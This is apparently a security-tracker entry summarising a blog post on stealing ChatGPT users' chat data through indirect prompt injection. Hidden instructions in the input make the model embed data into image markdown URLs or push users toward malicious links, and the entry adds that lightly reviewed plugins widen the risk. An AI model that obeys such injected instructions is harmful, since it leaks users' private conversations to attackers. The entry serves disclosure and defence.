Advanced Data Exfiltration Techniques with ChatGPT
Summary
An indirect prompt injection attack (tricking an AI into following hidden instructions in its input) can allow an attacker to steal chat data from ChatGPT users by either having the AI embed information into image URLs (image markdown injection, which embeds data into web links displayed as images) or convincing users to click malicious links. ChatGPT Plugins, which are add-ons that extend ChatGPT's functionality, create additional exfiltration risks because they have minimal security review before being deployed.
Classification
Affected Vendors
Related Issues
Original source: https://embracethered.com/blog/posts/2023/advanced-plugin-data-exfiltration-trickery/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 85%